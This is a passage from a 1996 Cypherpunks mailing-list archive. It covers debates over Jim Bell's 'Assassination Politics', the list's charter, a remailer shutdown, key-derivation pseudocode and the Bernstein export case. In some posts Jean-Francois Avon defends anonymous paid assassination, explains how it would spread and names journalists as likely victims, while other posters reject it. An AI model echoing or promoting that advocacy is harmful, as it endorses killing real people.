US south. Do as you like. Regrettably as long as there are British troops in Ireland, Britain will continue to encounter the occasional "Irish Cruise Missile." As several people have already pointed out, the solution is obvious. Brian From s1113645 at tesla.cc.uottawa.ca Tue Sep 24 14:48:51 1996 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Wed, 25 Sep 1996 05:48:51 +0800 Subject: LACC: Re: Australia now has information police In-Reply-To: <199609220643.QAA13076@suburbia.net> Message-ID: On Sun, 22 Sep 1996, Julian Assange wrote: > [re COCOM trade agreements] > > All COCOM countries most likely. That said Australia does not seem to be Didn't the COCOM treaty expire? From bryce at digicash.com Tue Sep 24 15:12:10 1996 From: bryce at digicash.com (bryce at digicash.com) Date: Wed, 25 Sep 1996 06:12:10 +0800 Subject: (non-)repudiation, AP, Hallam and me Message-ID: <199609241720.TAA08077@digicash.com> -----BEGIN PGP SIGNED MESSAGE----- I don't have the time or interest to read and write about Bell's evil kook daydreams or Baker's contorted statist rationalizations. Feel free to write any misrepresentations about me (in general or in specific) that you like. I'm sure in the long run it will do more harm to you than to me. For what it is worth, I long ago warned that cpunks needed to distance themselves from Bell in the public's eye. Nowadays I don't really care what the public thinks of cpunks. Regards, Bryce -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2 iQB1AwUBMkgYVEjbHy8sKZitAQHbpwL/XQfN72HBoOBmqodwD2WaAD4DBY6CP1zm VphitY08frCZcz/okbVlQx8Jzs68rDzkJAeGbYdeumYc5vixwkv0q0QCLTvluu+I t8fTfIuraSzZS2gUlE9BMkNirEK+z5jA =gnG0 -----END PGP SIGNATURE----- From whgiii at amaranth.com Tue Sep 24 15:20:22 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Wed, 25 Sep 1996 06:20:22 +0800 Subject: Public Schools In-Reply-To: Message-ID: <199609241652.LAA22261@mailhub.amaranth.com> In , on 09/23/96 at 11:00 AM, Dan Harmon said: > >One of the hardest things that we have to work hardest to counter-act >with our twins, who attend PS, is the socialization they >pick up at school. There is an easy solution to that problem, it's called home school. :) -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- From blancw at microsoft.com Tue Sep 24 15:22:07 1996 From: blancw at microsoft.com (Blanc Weber) Date: Wed, 25 Sep 1996 06:22:07 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: From: hallam at vesuvius.ai.mit.edu If you don't very clearly reject his murderous ideas you are going to regret it just as the left regreted having the USSR or the RAF associated with them. ........................................................................ ........... They wouldn't have to be repudiated in public. They could be repudiated in private, and he would never know what hit'im. There's so much hypocricy in the world, anyway, with groups not doing what they say or not saying what they really do, how can anyone believe what any group claims to believe in unless and until they engage in some kind of action. You might as well spend your time believing John Anonymous MacDonald. It's best to be prepared to defend yourself against anyone, regardless of what virtuous conduct they claim to believe in. .. Blanc > > > > From cbarnett at eciad.bc.ca Tue Sep 24 15:32:59 1996 From: cbarnett at eciad.bc.ca (Clint Barnett) Date: Wed, 25 Sep 1996 06:32:59 +0800 Subject: crypto anarchy vs AP In-Reply-To: <3.0b19.32.19960923225428.00b29a50@panix.com> Message-ID: exactly my point. clint barnett emily carr institute On Mon, 23 Sep 1996, Duncan Frissell wrote: > At 11:26 AM 9/23/96 -0700, Clint Barnett wrote: > > >ever read "1984"? the appearance of a free lifestyle is most definitely > >not a free lifestyle. I am hardly a friend of the state, and far from > >being an advocate of the church, but multinational corporations running > >the world for their own fun and profit makes my sphincter clench. > > The lifestyle in "1984" didn't appear free. Someone who thinks that an > institution like the government that gains all its revenue by force and is > armed with nukes is less dangerous than institutions that are shrinking in > size and gain most of their revenue by voluntary exchange is nuts. > > DCF > From jf_avon at citenet.net Tue Sep 24 15:36:56 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Wed, 25 Sep 1996 06:36:56 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: <9609241723.AB00771@cti02.citenet.net> > At 05:48 PM 9/23/96 -0400, hallam at vesuvius.ai.mit.edu wrote: > >When the IRA attemoted to assasinate my cousin I was in no > >way intimidated and neither was he. He continued as a senior > >poitician for over a decade despite continued danger. I can think > >of no less effective method of bringing about change in attitudes. I don't think you truly understood the *mechanism* of AP. Your cousin was threatened from an outside attack. Protection is relatively easy in that case. AP generates a threath * within * every * part * of every structure (family, work, friends, etc). As an analogy, when specialized demolishing team blows a building down, they don't use one big charge, they use hundreds of them to severe every load bearing member of the structure. AP would work the same, turning every person a potential motiveless assassin. I say "motiveless" because AP makes the motive not traceable to peoples or assets. Some AP assassins will get caught, but it is predictable that it will only be a minority and that with time, the percentage of caught assassins will get smaller as more professionnal assassin gets seriously into the business. JFA Please reply by e-mail as I am not anymore on Cypherpunks. Thanks Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Finest Limoges porcelain and crystal JFA Technologies, R&D consultant physicists and engineers, LabView programming PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From tcmay at got.net Tue Sep 24 15:48:21 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 25 Sep 1996 06:48:21 +0800 Subject: The Nature of the Cypherpunks List Message-ID: (Note: This started out as a comment on why I've been mostly silent during this latest of several efforts to disrupt the list, but I segued into a discussion of what this list talks about, and why, and why it can never be all things to all people. Pardon the length, but these are things I feel the need to say. Astute readers who've been on the list for several years will know that I've written a few other essays like this, usually about one per year. I suppose I should try to find my older essays and repost them, but I rarely repost old articles anymore....) THE LATEST ATTEMPT TO DISRUPT THE LIST I've been keeping my mouth shut lately on this whole Vulis--spam--Timmy--etc. thing, figuring that the one thing Vulis really wants to see is the list distracted by endless back-and-forth about whether "Timmy" really does the things Vulis and his "tentacles" claim, whether the list should be closed to non-subscribers, and on and on. But there comes a point where I need to speak up. (By the way, somebody even sent me a bizarre message, saying: "I am not quite sure why you have not shot back at Dr Virmin and his cause. Maybe that is the best way? Or are you guilty as charged?" So, to some, my silence means I might be guilty. Jeesh.) LET'S NOT BLOCK NONSUBSCRIBERS! A few comments on one of the recent messages: At 3:51 PM 9/24/96, Ray Arachelian wrote: >There is no reason we can't allow posts from those who are not subscribed >to the list. There's also no reason that we can't have someone moderate >those posts before they make it to the list to remove the spams - mind >you not to moderate the contents, but to remove repeating annoying spam >and advertisement. Blocking posts from non-subscribers would of course block all anonymous posts, something I don't think the Cypherpunks would be setting a good precedent in doing! Not only are most (all?) of the existing remailers essentially "our technology," but we believe (as an emergent consensus) that anonymous and pseudonymous speech is a Good Thing. "Cypherpunks block anonymous posts" would not be a good message to send, especially in these perilous times. (Sure, there are some workarounds. Stable nyms could be subscribed, as Black Unicorn and Lucky Green demonstrate. And nyms through nymservers. But not trivially, to add additional "allowed subscribers" without also sending them copies of messages.) MODERATION CONSIDERED HARMFUL As to moderation, let's nuke this idea right now. I know of no moderated list, except perhaps "RISKS," that's an improvement of unmoderated, open versions. (And RISKS is the personal project of Peter Neumann, who puts incredible effort into keeping it on track...I no of no person on our list who could or would do the same job, though I suspect some would jump at the chance to volunteer to do so, then probably let things fizzle out....) ... NO DEFENSE NEEDED On defending _me_ against the charges of Vulis and (one has to presume) his anonymous "Timmy warnings," don't bother. Please, don't bother. I don't need testimonials from others or votes of support. It just adds to the noise. If Vulis is ignored, he'll likely eventually go away, as some other well-known net.personalities have done. (Vulis claims we "drove away" Rich Salz, John Gilmore, Eric Hughes, etc. But do we then get credit for "driving away" Dr. Fred C. Cohen, Dr. David Sternlight, and Lawrence Detweiler? Fair is fair, after all. Not that I think the decisions people make to remain on mailing lists or in discussions, or in marriages for that matter, are usually the fault of others.) THE NATURE OF THE CYPHERPUNKS LIST Look, this list now has something like 1400 subscribers, according to something someone posted a few weeks ago. (I suspect at least a few hundred of those names are merely passive reflectors. And I certainly only "see" a few hundred names appearing here as posters, and only a few dozen as _active voices_ in debates. So I tend to view the list as being a few hundred moderately active readers, with the other thousand or so as nonsubscribers, effectively.) With hundreds of active readers, all sorts of things will get said. Some bizarre, some insulting, some insightful, some tangential, etc. Some of them are not liked by Vulis, some not like by Perry Metzger, some not liked by me. And as Eric Hughes noted, the list changes, and we change. Certainly the topics of today cannot be the same fresh, new topics of four years ago, when many of the basics were being discussed for the first time. Perforce, the list talks about things of current interest---the security measures in the wake of TWA 800 are a perfectly good, list-related topic. This is just one example, of many. While some folks would rather we talked only about "crypto," just how many times can basic questions about Diffie-Hellman, or RSA, or elliptic curves be discussed? At some point these issues become esoteric research topics, and are unlikely to be casually discussed on a mailing list such as ours. (And many of the ostensibly on-topic pure crypto questions are actually just banal questions about topics covered in any crypto textbooks! Which is not surprising, actually.) THE RAISON D'ETRE FOR CYPHERPUNKS And as I was there at the initial planning meeting in July of '92, and then at the first physical meeting, I can assure you that what soon became "Cypherpunks" was never intended to be an announcement list for research discoveries in mathematical cryptography! Much as some have been shrilly claiming "This list is for crypto and programming discussions only," this was *never* the intent. And, judging from the topics people have brought up over the past four years, the constituency for _only_ talking about mathematical cryptography and programming issues appears to be rather small. Nothing is stopping those who call for discussing only crypto and programming to do exactly that: discuss only crypto and programming. The serious crypto researchers, e.g., the Matt Blazes, the Whit Diffies, and the Carl Ellisons of the world, have various channels they use to communicate in. Conferences several times a year, limited mailing lists, other channels, etc. That they have all been members of the Cypherpunks list but are not any longer is their choice. There are lots of reasons people make the decision they can't cope with another mailing list, or that filtering it is taking too long, etc. For one thing, in the past few years the explosion of the Web and increased interest in things cryptographic has made it more difficult to find time for any of the channels of communication to be followed. And, as I noted, some of the discussions which were "fresh" a few years ago no longer are. This last point is not something any forum can do much about. Just as there are certain ecological truths about "large, hungry predators are never numerous," so, too, are there basic information-theoretic truths about the decline in freshness of topics: "not everything remains fresh and new forever." REAPING THE HARVEST When the Cypherpunks group and list got started, we reaped the harvest of work done from the mid-70s to the early 90s, with basic encryption (1976), secret-sharing (1980), digital mixes (1981), digital cash (1985), and various other abstract results ready to be *combined* with the parallel development of the Net, e-mail, Perl, and the Bay Area hacker community (from whom Eric and I drew for the organization of our first gathering...the response was tremendous). We felt there was a golden opportunity to take some of the academic research in the cryptographic community and "deploy" it on the Net. Deploy it in furtherance of various stated and unstated political and social beliefs we had. (I was a vocal libertarian, part of the "techno-libertarian" vanguard. Eric was less closely associated with libertarianism, though his actions were certainly consistent with this outlook. John Gilmore was, well, John. Active in forming the EFF and in fighting for various causes. Hugh Daniel, another early founder, was also a long-term activist in hypertext, networking, and libertarian issues. So, the several of us were much interested in deploying cryptographic protocols to implement interesting new social and political possibilities...at the very first meeting there were exciting discussions about new banking systems, an Italian scheme where the survivor of an N-person group gets a payoff (and we discussed how this could be implemented with Chaumian digicash), remailers (we tested models for remailers, and the Hughes/Finney remailer appeared within a month or two), and so on.) (Having attended the Crypto conference (in 1988), and having read "The Journal of Cryptology," the Eurocrypt, Asiacrypt, and Crypto Proceedings, I can tell you that the first Cypherpunks meeting (not named by Jude Milhon for another month or two) had a dramatically different "feel" to it. It was _not_ just another forum for releasing research results, or for discussing Unix hacks.) "YOU GUYS ARE JUST A BUNCH OF CYPHERPUNKS" As we talked about what we were doing, and who we were, various names popped up. "The Crypto Freedom League." "Privacy Hackers." "The Crypto Cabal." And so on. Jude Milhon's "You guys are just a bunch of cypherpunks," a wonderful pun on "cyberpunk" and the British spelling of "cipher," was accepted by acclamation. Though "punk" has some negative connotations, so do nice, staid names like "The Foundation for Unrestricted Cryptography," or "The Crypto Programmer's League." (We've had debates on the suitability of the name at least half a dozen times over the years. It ain't gonna change. The most that could happen is that some faction would claim to be the One True Faction and would call themselves by something more respectable (or less respectable, I guess). But the rest of us would still be Cypherpunks. Get used to it. Too late to change now.) THE INEVITABLE DECLINE IN FRESHNESS OF TOPICS Over the years, as remailers got deployed, as PGP spread, as "crypto" appeared more and more often in the popular press, the topics which were once so new and fresh inevitably had been through many, many cycles of discussion. We had 10 rounds of discussion of DC-Nets, 7 rounds of discussion of random number generators, 11 rounds of discussions of whether the NSA reads all mail, and so on. Not much can be done about this...new people join the list and ask questions, old-timers jump in with speculations, and sometimes news events trigger a debate. How else could it be? A moderated list with only announcements of new results? (This would likely generate about two messages per week, tops, and such a list would have few subscribers, and no interesting debate. Also, plenty of other fora exist for this, including the Usenet itself, e.g., sci.crypt.research.) WHAT IT IS No, for all its noise and faults, the list is what it is. Not perfect, but, then, few things are. And about as good as I've seen. (I've been on several other mailing lists, and the usual death of lists comes from disinterest and boredom, not from overuse. Filters are able to remove noise, but filters can't add signal.) That's all I have to say for now. By all means, try to contribute signal. But don't carp about how low the S/N ratio is, and don't carp about worthless messages. And don't chime in with unneeded "defenses" of me or anyone else attacked by kooks and nebbishes. --Tim May, whose reputation is, like the list, whatever it is, for whatever reasons, and who thus needs no defenders We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From stewarts at ix.netcom.com Tue Sep 24 15:58:03 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Wed, 25 Sep 1996 06:58:03 +0800 Subject: AP Protocol Failures [NOISE] Message-ID: <199609241701.NAA16848@attrh1.attrh.att.com> >> Troops are in Northern Ireland for a very simple and depressing >> reason. People like Jim want to impose their will on others by force. People have been imposing their will on others in Ireland for 800 years, and killing off the more prominent members of the opposition has been a long-term policy of the thugs who've been doing it. Today there are at least three competing gangs of thugs trying to impose their will on others by force. The Protestants are afraid that the Catholic majority on the island will enforce their rule on them, and the Catholics in the north are afraid that the Protestants will enforce their rule on them, both with good reason as near as I can tell. At least a few years ago, the IRA were spouting Marxist rhetoric and wanted to impose their Marxist thuggery on the whole island. The Queen's Empire's army understands AP better than the IRA does - they know the IRA's happy to kill Imperial soldiers who wander around unprotected. On the other hand, the IRA are a bunch of murdering thugs who blow up pubs and non-combatants as well as targeting soldiers. Some of the pro-Saxon Orangeheads do the same, of course, though most of them mainly like to have parades in Catholic neighborhoods to say "Nyahh, nyahh, we still rule you peons." The atrocities that the IRA and Brits commit against each other are both unsupportable, and lead to more conflict rather than peace, but neither side has the high moral ground to complain about it. But AP is great - adding more violence to Ireland is just the thing they need........ One of the strong negatives of AP is that it leads to reverse AP - if you don't know _which_ Hatfield killed the latest McCoy, you might as well just shoot one or two Hatfield Boys at random. If you kill off GrandDaddy Hatfield, there's nobody to say "OK, let's stop shooting each other"; instead there's a bunch of angry grandkids, and uncles, _all_ of whom have the authority to say "Let's go kill the McCoy bastards who did this!" The protocols may work when there's one hierarchical target - they don't work with two. Hammurabi's law about "An eye for an eye and a tooth for a tooth" was a _limitation_ on the amount of vengeance you were allowed to take, not a minimum required vengeance. jonathon wrote: > Do that op-ed piece --- but remember that AP is not a libertarian > position. Libertarian's think that government is a good thing. > AP thinks that government is a bad thing, and their philosophical > differences get wider, from there. Libertarians have varying opinions about government; some of us are anarchists, while some are minarchists. Most of us figure that once we've gotten rid of the first 90% of government, we can haggle about the rest of it then, in a much freer society, where people will have different perspectives on what stupid and obnoxious things they want the government to stop doing next. And if the well-intentioned-but-misguided minarchists prevail, it'll still be far better than today :-) Assassins, on the other hand, are generally on power trips - I don't see that replacing power-tripping wholesale murderers with lots of power-tripping retail murderers is really a good thing. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From s1113645 at tesla.cc.uottawa.ca Tue Sep 24 16:02:22 1996 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Wed, 25 Sep 1996 07:02:22 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: On Sun, 22 Sep 1996, Jim McCoy wrote: > Brian Davis > [...] > >Constitutional literalists take note: the First Amendment says nothing > >about what the executive branch or the states can do .... Doesn't the doctrine of limited powers mean that they cannot do what is not specified? (If I'm not mistaken, IANAL, etc...) > The states are prohibited through the 14th Amendment via the > Slaughterhouse cases, the ability of the executive branch to > violate due process is questionable (from a legal viewpoint, not > a practical one...the President cannot order you placed in jail > unless you have broken a law which requires congress to have > made the law in the first place...) And the ITARs are only executive orders, no? Not laws, right? I'm curious as to why they're considered valid. Anyone know? From hfinney at shell.portal.com Tue Sep 24 16:04:05 1996 From: hfinney at shell.portal.com (Hal) Date: Wed, 25 Sep 1996 07:04:05 +0800 Subject: Portal remailer shutting down Message-ID: <199609241903.MAA20095@jobe.shell.portal.com> The ISP which I have used for over five years, portal.com, is going out of business at the end of this month (September, 1996). This means that my remailer at hfinney at shell.portal.com will cease operations. I had asked that it be removed from the remailer lists a few weeks ago due to some problems, so hopefully not many people have been using it lately. But now it will go away for good. This remailer has been in operation since the fall of 1991. I believe it has been the longest continually running remailer on the net. It was one of the first "cypherpunk" remailers, based on Eric Hughes' code, to which I added support for PGP messages. (Actually there was a remailer running out of Australia for a short time earlier in 1991 which was the first to use PGP. It was a very nice system but got shut down supposedly due to traffic concerns, although there seemed to be some politics involved as well.) I have also been running a remailer from my account at hal at alumni.caltech.edu. However that one cannot tolerate abuse complaints, hence I have been forwarding all mail out of that remailer through the portal one, for a number of years. Now that Portal is gone, this will be a problem. I plan to restrict the alumni remailer to only send mail to other addresses on a fixed list, which will initially be just the other remailers. That way the remailer can be used to form chains, but not to send to end users. This limited functionality should still be useful. It may be possible to create a web page where people can sign up to say they would not object to receiving anonymous mail. Most people are open minded and curious enough that they wouldn't mind signing such a list. Make it easy enough and you will collect thousands of names. Now people who want to create nyms using remailer chains for return addresses can add their names to the list without feeling that they are compromising their identity. They can use a remailer which only sends to people on the list as the last remailer in their chain, with some confidence that the remailer is unlikely to be shut down due to abuse complaints. Hal From cbarnett at eciad.bc.ca Tue Sep 24 16:19:51 1996 From: cbarnett at eciad.bc.ca (Clint Barnett) Date: Wed, 25 Sep 1996 07:19:51 +0800 Subject: crypto anarchy vs AP In-Reply-To: <199609240700.AAA16178@mail.pacifier.com> Message-ID: if I'm not mistaken, large companies are able to purchase (in a way) government support. Special interest groups and large lobbying groups are also able to sway the government with either money , votes or things more insidious. You are absolutely right, big companies do get bigger because of (partly) government support of some form, but that's because they can afford to pay for it. clint barnett lord of the cosmos emily carr institute On Tue, 24 Sep 1996, jim bell wrote: > At 11:26 AM 9/23/96 -0700, Clint Barnett wrote: > > >>to create the appearance of as free a life style as they can for > >>individuals > > > >ever read "1984"? the appearance of a free lifestyle is most definitely > >not a free lifestyle. I am hardly a friend of the state, and far from > >being an advocate of the church, but multinational corporations running > >the world for their own fun and profit makes my sphincter clench. > > I think you're under a mis-impression here. At least in the libertarian > circles where I do most of my political discussion, it is generally > suspected that corporations grow large and powerful primarily BECAUSE OF > assistance by and due to the policies of government. (heavy regulation > favors large companies by keeping down small competitors, etc) Of course, > that cause/effect relationship is intentionally hidden, and most of the > public sees the show put on which appears to have the opposite effect: > Anti-trust lawsuits, etc. > > Over time, the public is gulled into the false belief that if you get rid of > the government, you get rid of the "only think that stands between us and > the multi-national corporations." They believe this because the only > government actions they see and recognize are anti-corporation. If they > were aware of the truth, they'd realize that these large corporations are > actually afraid of a free market, and that the companies consider big > government to be their friends.. > > Just look at an excellent example: Intel versus IBM. Intel used to be this > tiny upstart chip company from the Bay area and IBM was smokestack America. > Now, Intel is the biggest (by dollar volume, anyway) chip company in the > world and IBM is, well, considerably cut back from its heyday. At least in > hindsight, IBM would have been "smart" to squash Intel, or buy it up, or > have the government over-regulate it. > > > Jim Bell > jimbell at pacifier.com > From ses at tipper.oit.unc.edu Tue Sep 24 16:21:36 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 25 Sep 1996 07:21:36 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] In-Reply-To: <199609241518.JAA08759@InfoWest.COM> Message-ID: On Tue, 24 Sep 1996, attila wrote: > > go back to your beloved England and your labour unions your roots are showing :-) ----^ > NO, I will not outright reject Jim Bell's "Assassination > Politics." Assasination politics is impossible to defend from a classical Liberal/Libertarian position. Bell advocates arbitrary applications of violence and coercion without restriction. There is no way to justify the initiation of force without abandoning any pretence of being a Libertarian (which, to be fair, Bell doesn't claim to be). From perry at piermont.com Tue Sep 24 16:22:15 1996 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 25 Sep 1996 07:22:15 +0800 Subject: The Nature of the Cypherpunks List In-Reply-To: Message-ID: <199609241913.PAA19989@jekyll.piermont.com> Timothy C. May writes: > While some folks would rather we talked only about "crypto," just how many > times can basic questions about Diffie-Hellman, or RSA, or elliptic curves > be discussed? I think a better question is "do we need to have to make sure people are posting for the sake of posting? Why must we have a charter broad enough to generate too much volume to allow conversation?" Sure, there is a limit to what can be said about cryptography and the direct politics of cryptography. *THAT IS THE POINT*. That is why I'm starting a new list -- so that I can abandon this waste heap to those that like frolicking in the mire. > And as I was there at the initial planning meeting in July of '92, and then > at the first physical meeting, I can assure you that what soon became > "Cypherpunks" was never intended to be an announcement list for research > discoveries in mathematical cryptography! No. It was intended for discussion of cryptography *and* the politics of cryptography. Not theories about some airliner was shot down by aliens, not random musings on "assasination politics". The idea was never to be restricted just to the technical aspects of cryptography, but the notion was to have a place where the non-technical discussion also was on *cryptography*. This list no longer has *any* charter. A posting on sexual practices in Botswana is probably as "on topic" as anything else these days. The new list, however, will have a charter, and it *will* be enforced. > Much as some have been shrilly claiming "This list is for crypto and > programming discussions only," this was *never* the intent. Tim, I hate to say this, but cypherpunks is a sewer which has driven off anyone seriously interested in the area, and you are part of the reason. > The serious crypto researchers, e.g., the Matt Blazes, the Whit Diffies, > and the Carl Ellisons of the world, have various channels they use to > communicate in. For those who can think back a few years, this *used* to be one of those fora. No longer, of course. This is not for people serious about anything. I no longer read 99% of what is posted here -- its drek. I do not believe it would be good, however, for the list to be shut down, because there have to be sewers to carry the world's intellectual waste products, and if this list did not exist the likes of Jim Bell and the others would be out causing harm on other mailing lists. Perry PS Still looking for a solid site that can host a 1500 member significant volume mailing list without choking. From jf_avon at citenet.net Tue Sep 24 16:25:28 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Wed, 25 Sep 1996 07:25:28 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: <9609241724.AB00771@cti02.citenet.net> On 23 Sep 96 at 22:10, hallam at vesuvius.ai.mit.edu wrote: > People like Jim want to impose their will on others by > force. Mr. Bell pushing the AP scheme does not mean that he wants to impose his ideas by force since he will have *no* mean of controlling what ideas will be favored. It is strictly market forces that will dictates what will happens. As many, including Mr. Bell have pointed out, he might very well be one of the first victim of the AP system. Mr Bell is pushing AP because he believe that the bulk of human race wants to live peacefully and he therefore concludes that AP, being led by the demand of ordinary people, will lead to a more peacefull world. When you'll get to learn how AP operates, your conclusions of an AP regulated world will, IMO, be dependent on the specifics of your definition of human race. > Despite prolonged attempts by each faction to assasinate the > leaders of the other they have been unsuccessful. As I mentionned in my other post to you, this is not a reference since the operating mode of AP is entirely different. > If terrorists trained by Lybia and Syria are unable to assasinate > at will then we can be sure thaqt Jim's band of kooks is not going > to get any further. Again, absolutely irrelevant to AP. Go read the book again. > It is suprising that someone from the press has not seized upon > Jims ideas as cause for another cyber-scare. I suspect this is > because people like Markof are somewhat more responsible. No, it is not surprizing at all, but you did not seem to have understood why: 1) The dissatisfaction of the population is such that many would actively seek where to send their buck to have somebody offed. 2) The way AP works, journalists would be priviledged victims, paid for by the same disgruntled population 3) More than everything else, they (the journalists) probably understood *exactly* how AP works and thus fully realised point 2) > This is not going to stop me from producing an op-ed piece linkiing > the net libertarians to assasination politics unless I hear a few > more repudiations of Bell's ideas. That would be the best way of promoting AP. Every peoples who favor it would say: "Go ahead, it'll be our pleasure!" AP will not die for several reason. The first one is that it only requires knowledge and a little coding. The second is that there is a demand. Prostitution could never be eliminated. Yet, it does not menace the system itself. AP will be tougher than prostitution and it will probably actively seek the system's destruction (as we know it). I suggest you try to understand the mechanics of AP. jfa Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Finest Limoges porcelain and crystal JFA Technologies, R&D consultant physicists and engineers, LabView programming PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From jya at pipeline.com Tue Sep 24 16:27:45 1996 From: jya at pipeline.com (John Young) Date: Wed, 25 Sep 1996 07:27:45 +0800 Subject: ICI_96x Message-ID: <199609241940.TAA09129@pipe1.ny1.usa.pipeline.com> A fax appeared of the International Cryptography Institute, 1996, October 25-26, in DC. Here are excerpts: _________________________________________________________ What are the different national policies and regulations governing cryptography and how might these evolve? What cryptography technologies are on the market in different countries, what is being used, and for what purpose? What problems is cryptography causing law enforcement? What are the requirements of business and other organizations? What are the new trends in cryptography and what will be their impact on society? What efforts are leading toward an international cryptography framework? _________________________________________________________ Sample sessions: The International Cryptography Experiment Export controls on Encryption Software Cryptography: Recent Developments in the EU Towards an Australian Policy on Encryption New Russian Encryption Policies and Regulations International Regulation of Cryptography: Update U.S. Government Cryptography Policy Law Enforcement Requirements for Encryption Transnational Key Escrow Commercial and International Key Escrow Digital Cash _________________________________________________________ Some of 38 "Invited Faculty" Dr. Dorothy Denning, Georgetown University Mr. John Droge, Mykotronix Mr. Louis. J. Freeh, Director, FBI Mr. Michael Gilmore, FBI Mr. David Kahn, Author, NSA Dr. Kwok-Yeo Lam, National University of Singapore Dr. Anatoly N. Lebedev, LAN Crypto, Ltd. Mr. Ronald Lee, General Counsel, NSA Mr. Yves LeRoux, Digital Equipment Mr. Nick Mansfield, Shell International Petroleum Mr. Michael Nelson, White House Office STP Dr. Jean-Jacques Quisquatier, University of Louvain Mr. John Young, National Computer Board [Nope] ----- http://jya.com/ici96x.txt ICI_96x From aba at dcs.ex.ac.uk Tue Sep 24 16:35:00 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Wed, 25 Sep 1996 07:35:00 +0800 Subject: Transforming variable-length to fixed keys In-Reply-To: <84345225525232@cs26.cs.auckland.ac.nz> Message-ID: <199609241547.QAA00089@server.test.net> Peter Guttmann writes on cpunks: > I posted this to sci.crypt recently but the response to it was rather > underwhelming, so I thought I'd repost it here to see if anyone has any > comments on it. What it is is a scheme for transforming arbitrary user keys > (typically a long passphrase) into a fixed-length key for a particular > algorithm. This has the following properties: > 1. The user key 'userKey' is transformed into an algorithm-specific key 'key' > using a number of 'iterations' of a hash algorithm 'hash()'. > > 2. The transformation is strongly serialized so that any form of attack > involving parallelization or precomputation isn't possible. If the speed of your key generation is an issue, you could do something like: key[] = { 0 }; const int nhashes = 4; typedef void (*hashfnptr)(byte*, byte*, int); /* array of hash functions */ hashfnptr hash[ nhashes ] = { md5, sha1, haval, ... }; state = hash[ 0 ]( algorithm, mode, parameters, userKey ); for count = 1 to iterations for length = 1 to keyLength (in hash_output_size blocks) /* selecting a hash function based on the state */ state = hash[ state % nhashes ]( state ); key[ length ] = hash[ state % nhashes]( state, userKey ); This provides more expense in hardware for the same expense in software, so for the same CPU time you get more hardware expense, and could reduce the iterations for the same security. `nhashes' determined by the number of digest algorithms you consider trustworthy. (They need hardware for `nhashes' different digest algorithms). You need to do something about resolving the differing output and state sizes. Probably speed isn't an issue though. Adam From haystack at cow.net Tue Sep 24 16:37:36 1996 From: haystack at cow.net (Bovine Remailer) Date: Wed, 25 Sep 1996 07:37:36 +0800 Subject: Universal Avatar spec Message-ID: <9609241955.AA21939@cow.net> IBM, Velocity, and Chaco team up for identity on the net: http://www.chaco.com/avatar/avatar.html > The real power of Universal Avatars comes from the inclusion of > other capabilities into the system. First, consider the implications > of embedding a public key, or Netscape certificate, into the > Universal Avatar file. By introducing secure communications, the > avatar can effect instantaneous financial micro-transactions > seamlessly in a virtual world. For example, an avatar could walk > through a virtual mall and transparently purchase items. Since his/her > profile is under the strict control of the user, s/he could declare > an interest in modems. Virtual stores could then automate the process > of discovering where the potential customer's interests lie, while > keeping the customer's personal information strictly confidential and > email address safe from spamming. From haystack at cow.net Tue Sep 24 16:43:41 1996 From: haystack at cow.net (Bovine Remailer) Date: Wed, 25 Sep 1996 07:43:41 +0800 Subject: Bernstein hrg in the news Message-ID: <9609241946.AA21891@cow.net> Feds on the Ropes In Suit Challenging Arms Export Law (Dan Goodin, The Recorder (SF), 9/23/96, p.1) A professor who says federal restrictions on the export of encryption software violate his right to free speech seemed to get a sympathetic hearing from a federal judge on Friday. In a closely watched case challenging export restrictions on encryption software, U.S. District Judge Marilyn Hall Patel did not rule on summary judgment motions. But she appeared impatient when a U.S. Department of Justice attorney attempted to revive an issue settled months ago in that case. Patel handed plaintiff Daniel Bernstein a big victory in April, ruling that software is protected speech under the First Amendment. But the ruling in _Bernstein v. U.S. Department of State_, 95-0582, didn't deter government attorneys Friday from trying to reargue the point. Justice Department trial attorney Anthony Coppolino argued that the government controls on the export of software are not based on the content of the computer code but rather on its functionality. Therefore, he argued, the restrictions are not a prior restraint of speech protected under the Constitution. Patel replied: "You'll get a chance to argue that in another courtroom." Cindy Cohn, an associate with San Mateo's McGlashan & Sarrail representing Bernstein, said she was pleased with the way the hearing appeared to go. "My impression is the fact that [Patel] was asking more questions of [Coppolino] 